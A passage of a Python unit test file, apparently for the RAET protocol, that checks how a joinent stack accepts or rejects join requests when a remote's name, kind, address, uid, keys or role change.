self.assertIs(len(alpha.remotes), 0)
self.assertIs(len(alpha.nameRemotes), 0)
# Ensure remote role is pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Body
# Main: Body
# Kind: Body
# RHA: Header
# Nuid: Computed
# Fuid: Header
# Leid: 0
# Reid: Header
# Role: Body
# Keys: Body
# Sameness: SameAll
alpha.clearStats()
beta.clearStats()
# Join
self.join(beta, alpha)
# Action: Pend, Add, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIs(alpha.remotes.values()[0].acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Accept the transaction
alphaRemote = alpha.remotes.values()[0]
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
    def testJoinentNonVacuousImmutableRejectNewName(self):
        '''
        Test immutable joinent reject non-vacuous join with an updated name (H1)

        Beta renames itself and attempts a non-vacuous join.  Alpha is
        immutable, so it must reject the join, leave its remote untouched,
        and dump no remote or role data.
        '''
        console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewName.__doc__))
        # Status: None (auto accept keys)
        # Mode: Never, Once, Always (use Always as most loyal)
        alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
        # Mutable: No
        self.assertIs(alpha.mutable, None)
        # Vacuous: No
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha)
        # Ephemeral: No Nuid (the Nuid is known)
        alphaRemote = estating.RemoteEstate(stack=alpha,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Ensure remote status is None
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Name: New
        beta.name = 'beta_new'
        # Main: Old
        # Kind: Either
        # RHA: Either
        # Nuid: Old
        # Fuid: Either
        # Leid: Old
        # Reid: Either
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        keep = self.copyData(alphaRemote)  # snapshot to prove the remote is untouched
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid)
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, None)
        self.assertEqual(len(alpha.remotes), 1)
        self.assertEqual(len(alpha.nameRemotes), 1)
        self.assertEqual(len(beta.remotes), 0)
        self.assertEqual(len(beta.nameRemotes), 0)
        # Assert alphaRemote isn't modified
        self.assertTrue(self.sameAll(alphaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Assert remote and role aren't dumped
        remoteData = alpha.keep.loadRemoteData(beta.local.name)
        self.assertIs(remoteData, None)
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinentNonVacuousImmutableRejectNewMain(self):
'''
Test immutable joinent reject non-vacuous join with an updated main (H2)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewMain.__doc__))
# Status: None (auto accept keys)
# Mode: Never, Once, Always (use always as most loyal)
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Mutable: No
self.assertIs(alpha.mutable, None)
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
oldMain = None
newMain = True
# Name: Either
# Main: New
self.assertIs(beta.main, oldMain)
beta.main = newMain
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote and role aren't dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
    def testJoinentNonVacuousImmutableRejectNewKind(self):
        '''
        Test immutable joinent reject non-vacuous join with an updated kind (H3)

        Beta changes its kind and attempts a non-vacuous join.  Alpha is
        immutable, so it must reject (nack) the join, leave its remote
        untouched, and dump no remote or role data.
        '''
        console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewKind.__doc__))
        # Status: None (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
        # Mutable: No
        self.assertIs(alpha.mutable, None)
        # Vacuous: No
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha)
        # Ephemeral: No Nuid (the Nuid is known)
        alphaRemote = estating.RemoteEstate(stack=alpha,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Ensure remote status is None
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        oldKind = None
        newKind = 33  # arbitrary non-default kind value
        # Name: Either
        # Main: Either
        # Kind: New
        self.assertIs(beta.kind, oldKind)
        beta.kind = newKind
        # RHA: Either
        # Nuid: Old
        # Fuid: Either
        # Leid: Old
        # Reid: Either
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        keep = self.copyData(alphaRemote)  # snapshot to prove the remote is untouched
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid)
        # Action: Reject, nack
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, None)
        self.assertEqual(len(alpha.remotes), 1)
        self.assertEqual(len(alpha.nameRemotes), 1)
        self.assertEqual(len(beta.remotes), 0)
        self.assertEqual(len(beta.nameRemotes), 0)
        # Assert alphaRemote isn't modified
        self.assertTrue(self.sameAll(alphaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Assert remote and role aren't dumped
        remoteData = alpha.keep.loadRemoteData(beta.local.name)
        self.assertIs(remoteData, None)
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinentNonVacuousImmutableRejectNewRha(self):
'''
Test immutable joinent reject non-vacuous join with an updated remote host address (H4)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewRha.__doc__))
# Status: None (auto accept keys)
# Mode: Never, Once, Always (use always as most loyal)
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Mutable: No
self.assertIs(alpha.mutable, None)
# Simulate: alpha already know beta with ha=('127.0.0.1', 7532)
# beta connects with ha=('127.0.0.1', 7531)
oldHa = (beta.local.ha[0], 7532)
newHa = (beta.local.ha[0], beta.local.ha[1])
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=oldHa,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Name: Either
# Main: Either
# Appl: Either
# RHA: New: alpha remote ha is set to (127.0.0.1, 7532)
# new ha received from beta is (127.0.0.1, 7531)
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
self.assertEqual(alphaRemote.ha, oldHa)
self.assertEqual(beta.local.ha, newHa)
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, nack
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote and role aren't dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
    def testJoinentNonVacuousImmutableRejectNewFuid(self):
        '''
        Test immutable joinent reject non-vacuous join with an updated fuid (H5)

        Alpha knows beta under a stale fuid; beta attempts a non-vacuous join
        with a new fuid.  Alpha is immutable, so it must reject (nack) the
        join, leave its remote untouched, and dump no remote or role data.
        '''
        console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewFuid.__doc__))
        # Status: None (auto accept keys)
        # Mode: Never, Once, Always (use always as most loyal)
        alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
        # Mutable: No
        self.assertIs(alpha.mutable, None)
        # Vacuous: No
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha)
        # Simulate: alpha already knows beta with the stale fuid=33;
        # beta connects with a new fuid=newFuid
        oldFuid = 33
        newFuid = betaRemote.nuid
        # Ephemeral: No Nuid (the Nuid is known)
        alphaRemote = estating.RemoteEstate(stack=alpha,
                                            fuid=oldFuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Ensure remote status is None
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: Either
        # Nuid: Old
        # Fuid: New: alphaRemote has uid=33 that is 'old', betaRemote has uid=2
        # Leid: Old
        # Reid: New
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        keep = self.copyData(alphaRemote)  # snapshot to prove the remote is untouched
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid)
        # Action: Reject, nack
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, None)
        self.assertEqual(len(alpha.remotes), 1)
        self.assertEqual(len(alpha.nameRemotes), 1)
        self.assertEqual(len(beta.remotes), 0)
        self.assertEqual(len(beta.nameRemotes), 0)
        # Assert alphaRemote isn't modified
        self.assertTrue(self.sameAll(alphaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Assert remote and role aren't dumped
        remoteData = alpha.keep.loadRemoteData(beta.local.name)
        self.assertIs(remoteData, None)
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinentNonVacuousImmutableRejectNewKeys(self):
    '''
    Test immutable joinent reject non-vacuous join with an updated keys (H6)

    Beta rekeys (new signer/priver) and re-joins over a known remote; alpha
    is immutable so the key change cannot be applied and the join is nacked.
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewKeys.__doc__))
    # Status: None (auto accept keys)
    # Mode: Never, Once, Always (use always as most loyal)
    alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
    # Mutable: No
    self.assertIs(alpha.mutable, None)
    # Vacuous: No
    betaRemote = estating.RemoteEstate(stack=beta,
                                       fuid=0,
                                       sid=0,  # always 0 for join
                                       ha=alpha.local.ha)
    # Ephemeral: No Nuid (the Nuid is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    betaRemote.fuid = alphaRemote.nuid
    alpha.addRemote(alphaRemote)
    beta.addRemote(betaRemote)
    # Ensure remote status is None
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    # Name: Either
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: Old
    # Keys: New — beta regenerates both key pairs before joining
    beta.local.signer = nacling.Signer()
    beta.local.priver = nacling.Privateer()
    beta.dumpLocalRole()
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Reject, nack (assertions below verify the failed transaction)
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertIs(stack.mutable, None)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, None)
    self.assertEqual(len(alpha.remotes), 1)
    self.assertEqual(len(alpha.nameRemotes), 1)
    self.assertEqual(len(beta.remotes), 0)
    self.assertEqual(len(beta.nameRemotes), 0)
    # Assert alphaRemote isn't modified
    self.assertTrue(self.sameAll(alphaRemote, keep))
    self.assertIn('joinent_transaction_failure', alpha.stats)
    self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
    self.assertIn('joiner_transaction_failure', beta.stats)
    self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
    # Assert remote and role aren't dumped
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousImmutableRejectNewRole(self):
    '''
    Test immutable joinent reject non-vacuous join with an updated role (H7)

    Beta changes its role name and re-joins over a known remote; alpha is
    immutable so the role change cannot be applied and the join is nacked.
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewRole.__doc__))
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always (use always as most loyal)
    alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
    # Mutable: No
    self.assertIs(alpha.mutable, None)
    # Vacuous: No
    betaRemote = estating.RemoteEstate(stack=beta,
                                       fuid=0,
                                       sid=0,  # always 0 for join
                                       ha=alpha.local.ha)
    # Ephemeral: No Nuid (the Nuid is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    betaRemote.fuid = alphaRemote.nuid
    alpha.addRemote(alphaRemote)
    beta.addRemote(betaRemote)
    oldRole = 'beta'
    newRole = 'beta_new'
    # Name: Either
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: New
    self.assertIs(beta.local.role, oldRole)
    beta.local.role = newRole
    # Keys: Either
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Ensure remote status is None for both the old and the new role
    roleData = alpha.keep.loadRemoteRoleData(oldRole)
    self.assertEqual(roleData['role'], oldRole)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    roleData = alpha.keep.loadRemoteRoleData(newRole)
    self.assertEqual(roleData['role'], newRole)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Reject, nack
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertIs(stack.mutable, None)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, None)
    self.assertEqual(len(alpha.remotes), 1)
    self.assertEqual(len(alpha.nameRemotes), 1)
    self.assertEqual(len(beta.remotes), 0)
    self.assertEqual(len(beta.nameRemotes), 0)
    # Assert alphaRemote isn't modified
    self.assertTrue(self.sameAll(alphaRemote, keep))
    self.assertIn('joinent_transaction_failure', alpha.stats)
    self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
    self.assertIn('joiner_transaction_failure', beta.stats)
    self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
    # Assert remote and role aren't dumped (neither old nor new role touched)
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    roleData = alpha.keep.loadRemoteRoleData(oldRole)
    self.assertEqual(roleData['role'], oldRole)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    roleData = alpha.keep.loadRemoteRoleData(newRole)
    self.assertEqual(roleData['role'], newRole)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousRejectedRejectNewKeys(self):
    '''
    Test joinent rejects non-vacuous join request with new keys from already rejected estate (I1)

    Beta's role was explicitly rejected on alpha; even though alpha is
    mutable, a rekeyed beta must still be refused and the stored (rejected)
    role data left untouched.
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousRejectedRejectNewKeys.__doc__))
    # Mode: Never, Once (use once as more loyal)
    alpha, beta = self.bootstrapStacks()
    # Mutable: Yes
    alpha.mutable = True
    # Vacuous: No
    betaRemote = estating.RemoteEstate(stack=beta,
                                       fuid=0,
                                       sid=0,  # always 0 for join
                                       ha=alpha.local.ha)
    # Ephemeral: No Nuid (the Nuid is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    betaRemote.fuid = alphaRemote.nuid
    alpha.addRemote(alphaRemote)
    beta.addRemote(betaRemote)
    # Status: Rejected
    alpha.keep.rejectRemote(alphaRemote)
    # Ensure remote role is rejected
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Name: Either
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: Old
    # Keys: New — beta regenerates both key pairs before joining
    beta.local.signer = nacling.Signer()
    beta.local.priver = nacling.Privateer()
    beta.dumpLocalRole()
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Join with new keys
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Reject, don't clear
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    self.assertEqual(len(alpha.remotes), 1)
    self.assertEqual(len(alpha.nameRemotes), 1)
    self.assertEqual(len(beta.remotes), 0)
    self.assertEqual(len(beta.nameRemotes), 0)
    # Assert alphaRemote isn't modified
    self.assertTrue(self.sameAll(alphaRemote, keep))
    self.assertIn('joinent_transaction_failure', alpha.stats)
    self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
    self.assertIn('joiner_transaction_failure', beta.stats)
    self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
    # Assert remote and role aren't dumped
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    # Assert role dump isn't changed (still holds the OLD keys alphaRemote has)
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
    self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousRejectedRejectNewRole(self):
    '''
    Test joinent rejects non-vacuous join request with new role from already rejected estate (I2)

    Beta presents a new role name; mutable alpha applies the role change to
    the remote and dumps it, but the join itself is still pending/rejected
    because the (old) keys remain rejected under both role entries.
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousRejectedRejectNewRole.__doc__))
    # Mode: Never
    alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
    # Mutable: Yes
    alpha.mutable = True
    # Vacuous: No
    betaRemote = estating.RemoteEstate(stack=beta,
                                       fuid=0,
                                       sid=0,  # always 0 for join
                                       ha=alpha.local.ha)
    # Ephemeral: No Nuid (the nuid is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    betaRemote.fuid = alphaRemote.nuid
    alpha.addRemote(alphaRemote)
    beta.addRemote(betaRemote)
    # Status: Rejected
    alpha.keep.rejectRemote(alphaRemote)
    oldRole = 'beta'
    newRole = 'beta_new'
    # Name: Either
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: New
    self.assertIs(beta.local.role, oldRole)
    beta.local.role = newRole
    beta.dumpLocalRole()
    # Keys: Either
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Ensure remote role is rejected
    roleData = alpha.keep.loadRemoteRoleData(oldRole)
    self.assertEqual(roleData['role'], oldRole)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Ensure alpha knows nothing about the new role
    roleData = alpha.keep.loadRemoteRoleData(newRole)
    self.assertEqual(roleData['role'], newRole)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    # Join with a new role
